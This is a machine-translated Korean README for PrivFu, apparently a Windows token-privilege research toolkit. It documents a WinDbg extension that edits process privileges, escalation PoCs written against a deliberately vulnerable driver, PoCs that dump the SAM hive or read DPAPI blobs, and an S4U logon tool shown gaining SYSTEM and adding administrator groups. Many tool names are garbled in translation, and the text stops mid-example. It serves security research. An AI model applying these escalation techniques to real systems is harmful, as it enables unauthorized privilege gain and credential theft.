PrivFu
1.0.0
커널 모드 WINDBG 확장 및 POC가 토큰 권한 작동 방식을 테스트하기위한 POC.
토큰 특권 남용에 관한 주목할만한 저장소와 기사가 있습니다. 이 저장소의 코드는 토큰 권한 작동 방식을 조사하는 데 도움이됩니다.
위로 돌아갑니다
프로젝트
이 프로젝트는 높은 무결성 레벨 쉘에서 시스템 권한을 얻는 방법을 다룹니다. 자세한 내용은 readme.md를 참조하십시오.
위로 돌아갑니다
프로젝트
이 프로젝트의 목적은 공격자가 임의의 커널을 남용하는 방법을 조사하는 것입니다. 모든 POC는 Hacksys Extreme 취약한 드라이버를 위해 작성되었습니다. 이러한 POC의 대부분은 임의의 커널 쓰기 취약성 및 토큰 권한을 남용하여 시스템 무결성 수준을 얻기 위해 수행합니다. Windows 10 버전 1809/1903에서 테스트했지만 대부분의 Windows 10의 대부분은 이론적으로 작동해야합니다.
| POC 이름 | 설명 |
|---|---|
| CreateAsSignTokenVariant | 이 POC는 SeCreateTokenPrivilege 및 SeAssignPrimaryTokenPrivilege 와 함께 EOP를 수행합니다. |
| himpersonatekenvariant를 작성하십시오 | 이 POC는 SeCreateTokenPrivilege 및 SeImpersonatePrivilege 와 함께 EOP를 수행합니다. |
| CreateTokenVariant | 이 POC는 SeCreateTokenPrivilege 와 함께 EOP를 수행합니다. |
| 디버그 니버 젝트 변수 | 이 POC는 SeDebugPrivilege 와 함께 EOP를 수행합니다. 최종 단계에서 Winlogon.exe에 코드 주입을 사용합니다. |
| DebugupdateProcVariant | 이 POC는 SeDebugPrivilege 와 함께 EOP를 수행합니다. 최종 단계에서 UpdateProcThreadAttribute API를 사용하여 WinLogon.exe에서 시스템 프로세스를 만듭니다. |
| 복원 자비 혁신 분위기 | 이 POC는 SeRestorePrivilege 와 함께 EOP를 수행합니다. 이 POC와 함께 Lijackshelllib를 사용하십시오. |
| 2 차 로그 - 비안 | 이 POC는 SeCreateTokenPrivilege 및 SeImpersonatePrivilege 와 함께 EOP를 수행합니다. 최종 단계에서 보조 로그온 서비스를 사용합니다. |
| TakeOnersHipServicEmodificationVariant | 이 POC는 SeTakeOwnershipPrivilege 와 함께 EOP를 수행합니다. 이 POC와 함께 Lijackshelllib를 사용하십시오. |
| tcbs4uassigntokenvariant | 이 POC는 SeTcbPrivilege 와 함께 EOP를 수행합니다. 중간 필수 수준에서 시스템 필수 레벨 쉘을 얻습니다. |
| TCBS4UIMPERATIONATIONATIONT | 이 POC는 SeTcbPrivilege 와 함께 EOP를 수행합니다. S4U 로그온으로 스레드 가장합니다. 높거나 시스템 무결성 수준이 높지 않습니다. |
위로 돌아갑니다
프로젝트
경고
일부 환경에서는 디버그 빌드가 작동하지 않습니다. 릴리스 빌드가 선호됩니다.
Priveditor는 특정 프로세스의 토큰 권한을 조작하기위한 커널 모드 WINDBG 확장입니다. 이 확장으로는 조사하려는 토큰 권한을 쉽게 구성 할 수 있습니다.
0: kd> .load C:devPrivEditorx64ReleasePrivEditor.dll
PrivEditor - Kernel Mode WinDbg extension for token privilege edit.
Commands :
+ !getps : List processes in target system.
+ !getpriv : List privileges of a process.
+ !addpriv : Add privilege(s) to a process.
+ !rmpriv : Remove privilege(s) from a process.
+ !enablepriv : Enable privilege(s) of a process.
+ !disablepriv : Disable privilege(s) of a process.
+ !enableall : Enable all privileges available to a process.
+ !disableall : Disable all privileges available to a process.
[*] To see command help, execute "!<Command> help" or "!<Command> /?".
이 명령은 대상 시스템에 프로세스를 나열하는 것입니다.
0: kd> !getps /?
!getps - List processes in target system.
Usage : !getps [Process Name]
Process Name : (OPTIONAL) Specifies filter string for process name.
인수 없이이 명령을 실행하면이 명령은 다음과 같이 대상 시스템의 모든 프로세스를 나열합니다.
0: kd> !getps
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
0 0xfffff805`81233630 0x00000000`00000000 Idle
4 0xffffd60f`ec068380 0xffffaf00`cec07a40 System
68 0xffffd60f`f1780480 0xffffaf00`d3b290a0 svchost.exe
88 0xffffd60f`ec0db080 0xffffaf00`cec0d080 Registry
324 0xffffd60f`ef342040 0xffffaf00`d0416080 smss.exe
348 0xffffd60f`f052f100 0xffffaf00`d25d30a0 dwm.exe
408 0xffffd60f`eca8e140 0xffffaf00`d21bd930 csrss.exe
480 0xffffd60f`f05a8340 0xffffaf00`d2568670 svchost.exe
484 0xffffd60f`efcd60c0 0xffffaf00`d06430e0 wininit.exe
500 0xffffd60f`efd130c0 0xffffaf00`d23100a0 csrss.exe
580 0xffffd60f`efdc0080 0xffffaf00`d2266630 winlogon.exe
--snip--
특정 프로세스를 알고 싶다면 문자열 필터를 다음과 같이 설정하십시오. 필터는 Forward Matching 및 Case Insensitive와 함께 작동합니다.
0: kd> !getps micro
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
4568 0xffffd60f`f14ed080 0xffffaf00`d3db60a0 MicrosoftEdge.exe
4884 0xffffd60f`f1647080 0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe
4892 0xffffd60f`f1685080 0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe
이 명령은 특정 프로세스의 토큰 권한을 나열하는 것입니다.
0: kd> !getpriv /?
!getpriv - List privileges of a process.
Usage : !getpriv <PID>
PID : Specifies target process ID.
이 명령을 사용하려면 다음과 같이 10 진수 형식으로 대상 프로세스 ID를 설정해야합니다.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
이 명령은 특정 프로세스에 토큰 권한을 추가하는 것입니다.
0: kd> !addpriv /?
!addpriv - Add privilege(s) to a process.
Usage : !addpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
+ IncreaseQuota : SeIncreaseQuotaPrivilege.
+ MachineAccount : SeMachineAccountPrivilege.
+ Tcb : SeTcbPrivilege.
+ Security : SeSecurityPrivilege.
+ TakeOwnership : SeTakeOwnershipPrivilege.
+ LoadDriver : SeLoadDriverPrivilege.
+ SystemProfile : SeSystemProfilePrivilege.
+ Systemtime : SeSystemtimePrivilege.
+ ProfileSingleProcess : SeProfileSingleProcessPrivilege.
+ IncreaseBasePriority : SeIncreaseBasePriorityPrivilege.
+ CreatePagefile : SeCreatePagefilePrivilege.
+ CreatePermanent : SeCreatePermanentPrivilege.
+ Backup : SeBackupPrivilege.
+ Restore : SeRestorePrivilege.
+ Shutdown : SeShutdownPrivilege.
+ Debug : SeDebugPrivilege.
+ Audit : SeAuditPrivilege.
+ SystemEnvironment : SeSystemEnvironmentPrivilege.
+ ChangeNotify : SeChangeNotifyPrivilege.
+ RemoteShutdown : SeRemoteShutdownPrivilege.
+ Undock : SeUndockPrivilege.
+ SyncAgent : SeSyncAgentPrivilege.
+ EnableDelegation : SeEnableDelegationPrivilege.
+ ManageVolume : SeManageVolumePrivilege.
+ Impersonate : SeImpersonatePrivilege.
+ CreateGlobal : SeCreateGlobalPrivilege.
+ TrustedCredManAccess : SeTrustedCredManAccessPrivilege.
+ Relabel : SeRelabelPrivilege.
+ IncreaseWorkingSet : SeIncreaseWorkingSetPrivilege.
+ TimeZone : SeTimeZonePrivilege.
+ CreateSymbolicLink : SeCreateSymbolicLinkPrivilege.
+ DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.
+ All : All privileges.
예를 들어, SedeBugPrivilege를 특정 프로세스로 설정하려면 첫 번째 인수에 대한 대상 프로세스 ID를 설정하고 다음과 같이 두 번째 인수에 대한 도움말 메시지에 나열된대로 권한 이름 debug 단축하십시오.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
0: kd> !addpriv 5704 debug
[>] Trying to add SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
특권 이름 인수는 사례 무의미합니다.
한 번에 모든 토큰 권한을 추가하려면 all 권한 이름 인수로 설정하십시오.
0: kd> !addpriv 5704 all
[>] Trying to add all privileges.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege Disabled
SeIncreaseQuotaPrivilege Disabled
SeMachineAccountPrivilege Disabled
SeTcbPrivilege Disabled
SeSecurityPrivilege Disabled
--snip--
이 명령은 특정 프로세스에서 토큰 권한을 제거하는 것입니다.
0: kd> !rmpriv /?
!rmpriv - Remove privilege(s) from a process.
Usage : !rmpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
sechangenotifyprivilege를 제거하려면 다음과 같이이 명령을 실행하십시오.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
0: kd> !rmpriv 352 changenotify
[>] Trying to remove SeChangeNotifyPrivilege.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
!addpriv 명령으로, all 권한 이름 인수로 설정하여 한 번에 모든 토큰 권한을 제거 할 수 있습니다.
0: kd> !rmpriv 352 all
[>] Trying to remove all privileges.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
이 명령은 특정 프로세스의 토큰 권한을 활성화하는 것입니다.
0: kd> !enablepriv /?
!enablepriv - Enable privilege(s) of a process.
Usage : !enablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
첫 번째 인수는 프로세스 ID에 대한 것이고 두 번째 인수는 토큰 권한 이름입니다.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 timezone
[>] Trying to enable SeTimeZonePrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
권한을 활성화하려고 시도한 경우 아직 추가되지 않은이 명령은 자동으로 추가됩니다.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 debug
[*] SeDebugPrivilege is not present.
[>] Trying to add SeDebugPrivilege.
[>] Trying to enable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
이 명령은 특정 프로세스의 토큰 권한을 비활성화하는 것입니다.
0: kd> !disablepriv /?
!disablepriv - Disable privilege(s) of a process.
Usage : !disablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
이 명령을 사용하려면 첫 번째 인수에 대한 대상 프로세스 ID를 설정하고 두 번째 인수에 대한 토큰 권한 이름을 설정하십시오.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !disablepriv 1932 debug
[>] Trying to disable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
이 명령은 특정 프로세스에 사용할 수있는 모든 토큰 권한을 활성화하는 것입니다.
0: kd> !enableall /?
!enableall - Enable all privileges available to a process.
Usage : !enableall <PID>
PID : Specifies target process ID.
다음과 같이 작동합니다.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !enableall 3792
[>] Trying to enable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
이 명령은 특정 프로세스에 대해 모든 토큰 권한을 비활성화하는 것입니다.
0: kd> !disableall /?
!disableall - Disable all privileges available to a process.
Usage : !disableall <PID>
PID : Specifies target process ID.
이 명령은 !disablepriv <PID> all 와 동일합니다. 다음과 같이 작동합니다.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !disableall 3792
[>] Trying to disable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
위로 돌아갑니다
프로젝트
이 프로젝트는 SeDebugPrivilege 와 같은 민감한 토큰 권한을위한 POC입니다. 현재 POC를 출시했습니다.
| 프로그램 이름 | 설명 |
|---|---|
| SeauditPrivilegepoc | 이 POC는 SeAuditPrivilegePoC 의 새로운 보안 이벤트를 만들려고합니다. SeAuditPrivilege 높은 무결성 수준이 필요하지 않지만이 POC는 새로운 이벤트 소스를 설치하기 위해 첫 번째 실행시 관리 권한이 필요합니다. 또한 결과를 확인하기 위해이 POC는 지역 보안 정책 설정을 수정해야 할 수 있습니다. |
| sebackupprivilegepoc | 이 POC는 SeBackupPrivilege 에 의해 HKLMSAM 덤프하려고합니다. |
| secreatePageFilePrivilegepoc | 이 POC는 SeCreatePagefilePrivilege 통해 PageFile 옵션을 특정 값으로 설정하려고합니다. |
| Secreatekenprivilegepoc | 이 POC는 SeCreateTokenPrivilege 에 의해 높은 토큰을 만들려고합니다. |
| Sedebugprivilegepoc | 이 POC는 SeDebugPrivilege 의 Winlogon.exe에 대한 핸들을 열려고합니다. |
| SERESTOREPRIVILEGEPOC | 이 POC는 SeRestorePrivilege 의 C:WindowsSystem32 에서 테스트 파일을 작성하려고합니다. |
| sesecurityprivilegepoc | 이 POC는 SeSecurityPrivilege 의 최신 보안 이벤트를 읽으려고합니다. |
| seshutdownprivilegepoc | 이 POC는 SeShutdownPrivilege 에 의해 BSOD를 유발하려고합니다. |
| sesystemenvironmentmentprivilegepoc | 이 POC는 SeSystemEnvironmentPrivilege 에 의해 시스템 환경을 열거하려고합니다. UEFI 기반 시스템에서만 작동합니다. OS 기능으로 인해이 POC는 이전 Windows 10 Build 1809의 OS에서 작동하지 않습니다. |
| setakeownershipprivilegepoc | 이 POC는 HKLM:SYSTEMCurrentControlSetServicesdmwappushservice 의 소유자를 SeTakeOwnershipPrivilege 를 통해 발신자 사용자 계정으로 변경하려고합니다. |
| SETCBPRIVILEGEPOC | 이 POC는 SeTcbPrivilege 에 의해 BuiltinBackup Operators 할 S4U 로그온을 수행하려고합니다. |
| setRustedCredManaccessPrivilegepoc | 이 POC는 SeTrustedCredManAccessPrivilege 의 DPAPI Blob에 액세스하려고합니다. |
위로 돌아갑니다
프로젝트
이 도구는 SetCBPRIVILEGE로 S4U 로그온을 수행하는 것입니다. 이 도구로 S4U 로그온을 수행하려면 관리 권한이 필요합니다.
PS C:Tools> .S4uDelegator.exe -h
S4uDelegator - Tool for S4U Logon.
Usage: S4uDelegator.exe [Options]
-h, --help : Displays this help message.
-l, --lookup : Flag to lookup account SID.
-x, --execute : Flag to execute command.
-c, --command : Specifies command to execute. Default is cmd.exe.
-d, --domain : Specifies domain name to lookup or S4U logon.
-e, --extra : Specifies group SIDs you want to add for S4U logon with comma separation.
-n, --name : Specifies account name to lookup or S4U logon.
-s, --sid : Specifies SID to lookup.
이 도구를 사용하려면 -l 또는 -x 플래그를 지정해야합니다. -l 플래그는 다음과 같이 계정 정보를 찾는 것입니다.
PS C:Tools> .S4uDelegator.exe -l -d contoso -n "domain admins"
[*] Account Name : CONTOSODomain Admins
[*] SID : S-1-5-21-3654360273-254804765-2004310818-512
[*] Account Type : Group
PS C:Tools> .S4uDelegator.exe -l -s S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Name : NT SERVICEWinDefend
[*] SID : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup
S4U 로그온으로 명령을 실행하려면 -x 플래그를 설정하고 다음과 같이 계정 이름 또는 sid를 지정하십시오. 실행 명령은 -c 옵션으로 지정할 수 있습니다 (기본값은 cmd.exe ) :
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============ =============================================
contosojeff S-1-5-21-3654360273-254804765-2004310818-1105
PS C:Tools> .S4uDelegator.exe -x -d . -n admin
[*] S4U logon target information:
[*] Account : CL01admin
[*] SID : S-1-5-21-2659926013-4203293582-4033841475-500
[*] UPN : (Null)
[*] Type : User
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.
C:Tools>whoami /user
USER INFORMATION
----------------
User Name SID
========== =============================================
cl01admin S-1-5-21-2659926013-4203293582-4033841475-500
추가 그룹 정보를 추가하려면 다음과 같이 -e 옵션을 사용하여 쉼표로 분리 된 값으로 그룹 SID를 설정하십시오.
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============= =============================================
contosodavid S-1-5-21-3654360273-254804765-2004310818-1104
PS C:Tools> .S4uDelegator.exe -x -d contoso -n jeff -e S-1-5-32-544,S-1-5-20 -c powershell
[*] S4U logon target information:
[*] Account : CONTOSOjeff
[*] SID : S-1-5-21-3654360273-254804765-2004310818-1105
[*] UPN : [email protected]
[*] Type : User
[>] Verifying extra group SID(s).
[*] BUILTINAdministrators (SID : S-1-5-32-544) will be added as a group.
[*] NT AUTHORITYNETWORK SERVICE (SID : S-1-5-20) will be added as a group.
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============ =============================================
contosojeff S-1-5-21-3654360273-254804765-2004310818-1105
PS C:Tools> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYThis Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK SERVICE Well-known group S-1-5-20 Mandatory group, Enabled by default, Enabled group
CONTOSOServerAdmins Group S-1-5-21-3654360273-254804765-2004310818-1103 Mandatory group, Enabled by default, Enabled group
Service asserted identity Well-known group S-1-18-2 Mandatory group, Enabled by default, Enabled group
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
경고
대상 머신에 대한 비전지없는 계정으로 S4U 로그온을 시도하면 오류
0xC0000142(STATUS_DLL_INIT_FAILED)가 발생하고 명령을 실행할 수 없습니다. 이 문제를 피하려면 권한있는 그룹을-e옵션을 가진 추가 그룹으로 추가하십시오.추가로, 일부 계정은 S4U 로그온에 대한 추가 그룹 (예 :
NT SERVICETrustedInstaller)으로 지정할 수 없습니다. 해당 그룹 계정을 추가 그룹으로 설정하면 오류0x00000005(ERROR_ACCESS_DENIED)로 S4U 로그온이 실패합니다.
위로 돌아갑니다
프로젝트
이 도구는 프로세스의 특정 토큰 권한을 활성화하거나 비활성화하는 것입니다.
PS C:Dev> .SwitchPriv.exe -h
SwitchPriv - Tool to control token privileges.
Usage: SwitchPriv.exe [Options]
-h, --help : Displays this help message.
-d, --disable : Specifies token privilege to disable or "all".
-e, --enable : Specifies token privilege to enable or "all".
-f, --filter : Specifies token privilege you want to remain.
-i, --integrity : Specifies integrity level to set in decimal value.
-p, --pid : Specifies the target PID. Default specifies PPID.
-r, --remove : Specifies token privilege to remove or "all".
-s, --search : Specifies token privilege to search.
-g, --get : Flag to get available privileges for the target process.
-l, --list : Flag to list values for --integrity options.
-S, --system : Flag to run as "NT AUTHORITYSYSTEM".
--integrity 옵션에 대한 값을 나열하려면 다음과 같이 --list 플래그로 실행하십시오.
PS C:Dev> .SwitchPriv.exe -l
Available values for --integrity option:
* 0 : UNTRUSTED_MANDATORY_LEVEL
* 1 : LOW_MANDATORY_LEVEL
* 2 : MEDIUM_MANDATORY_LEVEL
* 3 : MEDIUM_PLUS_MANDATORY_LEVEL
* 4 : HIGH_MANDATORY_LEVEL
* 5 : SYSTEM_MANDATORY_LEVEL
* 6 : PROTECTED_MANDATORY_LEVEL
* 7 : SECURE_MANDATORY_LEVEL
Example :
* Down a specific process' integrity level to Low.
PS C:> .SwitchPriv.exe -p 4142 -s 1
Protected and Secure level should not be available, but left for research purpose.
대상 프로세스 'PID는 -p 옵션으로 지정됩니다. 다음과 같이 -g 플래그 및 -p 옵션을 사용하여 대상 프로세스에 사용 가능한 권한을 나열 할 수 있습니다.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
-p 옵션이 지정되지 않은 경우 PID는이 도구의 상위 PID입니다.
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 6772
[*] Process Name : powershell
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
제어 할 권한 이름은 대상 프로세스에 사용 가능한 권한에 고유 한 권한 이름을 지정할 수있는 모든 경우의 둔감 한 문자열과 관련이 있습니다. 예를 들어, 대상 프로세스에 SeUndockPrivilege 활성화하려면 다음과 같이 --enable 옵션으로 실행하십시오.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -e und
[>] Trying to enable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] SeUndockPrivilege is enabled successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
고유 한 권한 이름을 지정할 수없는 가짜 문자열을 설정하면 다음 메시지가 표시됩니다.
PS C:Dev> .SwitchPriv.exe -p 9408 -e se
[>] Trying to enable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[-] Cannot specify a unique privilege to enable.
[*] SeShutdownPrivilege
[*] SeChangeNotifyPrivilege
[*] SeUndockPrivilege
[*] SeIncreaseWorkingSetPrivilege
[*] SeTimeZonePrivilege
[*] Done.
예를 들어, sechangenotifyprivilege를 활성화하려면 다음과 같이 --disable 옵션으로 실행하십시오.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
